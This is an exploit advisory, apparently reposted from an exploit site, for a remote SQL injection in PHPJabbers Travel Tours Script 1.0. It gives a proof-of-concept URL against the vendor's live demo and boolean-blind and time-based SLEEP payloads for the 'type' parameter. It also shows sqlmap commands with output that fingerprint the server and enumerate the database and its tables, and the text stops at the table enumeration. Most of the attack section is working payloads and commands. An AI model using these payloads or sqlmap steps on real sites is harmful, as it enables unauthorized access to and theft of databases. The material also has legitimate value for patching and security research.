Travel Tours Script 1.0 SQL Injection Vulnerability exploit

Share

## https://sploitus.com/exploit?id=1337DAY-ID-37844 ┌┌────────────────────────────────────────────────────────────────────────────┐ ││ C r a C k E r ┌┘ ┌┘ T H E C R A C K O F E T E R N A L M I G H T ││ └────────────────────────────────────────────────────────────────────────────┘┘ ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐ ┌┌────────────────────────────────────────────────────────────────────────────┐ ┌┘ [ Exploits ] ┌┘ └────────────────────────────────────────────────────────────────────────────┘┘ : Author : CraCkEr │ │ : │ Website : phpjabbers.com │ │ │ │ Vendor : PHPJABBERS │ │ Travel Tours Script │ │ Software : Travel Tours Script V1.0 │ │ │ │ Vuln Type: Remote SQL Injection │ │ A content management solution for │ │ Method : GET │ │ travel agencies and tour operators │ │ Critical : High [░░▒▒▓▓██] │ │ │ │ Impact : Database Access │ │ │ │ ─────────────────────────────────────┘ └────────────────────────────────────│ │ B4nks-NET irc.b4nks.tk #unix ┌┘ └────────────────────────────────────────────────────────────────────────────┘┘ : : │ Release Notes: │ │ ═════════════ │ │ Typically used for remotely exploitable vulnerabilities that can lead to │ │ system compromise. │ │ │ ┌┌────────────────────────────────────────────────────────────────────────────┐ ┌┘ Exploit URL's ┌┘ └────────────────────────────────────────────────────────────────────────────┘┘ Live Demo Site: https://www.phpjabbers.com/travel-tours-script/#sectionDemo POC: https://demo.phpjabbers.com/1657840896_841/front.php?controller=pjListings&action=pjActionListings&listing_search=1&view=list&item_per_page=10&type=1'[Injection] GET parameter 'type' is vulnerable --- Parameter: type (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: controller=pjListings&action=pjActionListings&listing_search=1&view=list&item_per_page=10&type=1) AND 8667=8667 AND (4844=4844 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: controller=pjListings&action=pjActionListings&listing_search=1&view=list&item_per_page=10&type=1) AND (SELECT 7164 FROM (SELECT(SLEEP(5)))loCg) AND (7206=7206 --- [+] Starting the Attack sqlmap.py -u "https://demo.phpjabbers.com/1657840896_841/front.php?controller=pjListings&action=pjActionListings&listing_search=1&view=list&item_per_page=10&type=1" --current-db --batch --random-agent --no-cast the back-end DBMS is MySQL web server operating system: Linux CentOS 6 web application technology: Apache 2.2.15 back-end DBMS: MySQL >= 5.0.12 [INFO] fetching current database current database: 'pjabbers_demo_vpl' sqlmap.py -u "https://demo.phpjabbers.com/1657840896_841/front.php?controller=pjListings&action=pjActionListings&listing_search=1&view=list&item_per_page=10&type=1" -D pjabbers_demo_vpl --tables --batch --random-agent --no-cast